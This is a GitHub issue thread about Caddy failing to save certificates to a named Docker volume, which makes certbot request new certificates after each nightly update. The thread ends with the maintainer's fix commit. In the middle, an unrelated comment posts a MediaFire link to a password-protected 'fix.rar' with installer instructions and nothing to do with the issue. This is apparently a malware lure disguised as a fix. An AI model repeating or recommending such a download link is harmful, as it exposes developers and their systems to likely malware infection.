### ISSUE TITLE
named volume: certbot certificates purged after nightly update

### ISSUE THREAD

**Issue by MiahaCybersec** [MiahaCybersec/Hardened-Signal-Proxy#1]
Expected behaviour: Caddy reuses the same certificate after an update and only renews the certificate when it's about to expire.

Observed behaviour: The named volume seems to be setup incorrectly. After every update at 00:30 UTC, certbot requests a new certificate because Caddy is not properly saving it to the named volume. This results in potential rate limiting issues.

Good first steps:

- Ensure the directory Caddy uses to store certificates is being passed into the named volume properly
- Look into the `CADDYPATH` environment variable to set our own certificate path
- Reference official documentation from Caddy and [third party repos](https://github.com/abiosoft/caddy-docker?tab=readme-ov-file#saving-certificates) to see if a setting was missed

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MiahaCybersec** [comment]
Fixed in 7bb661816d2ec46932545918ce5209d4dfb00df4
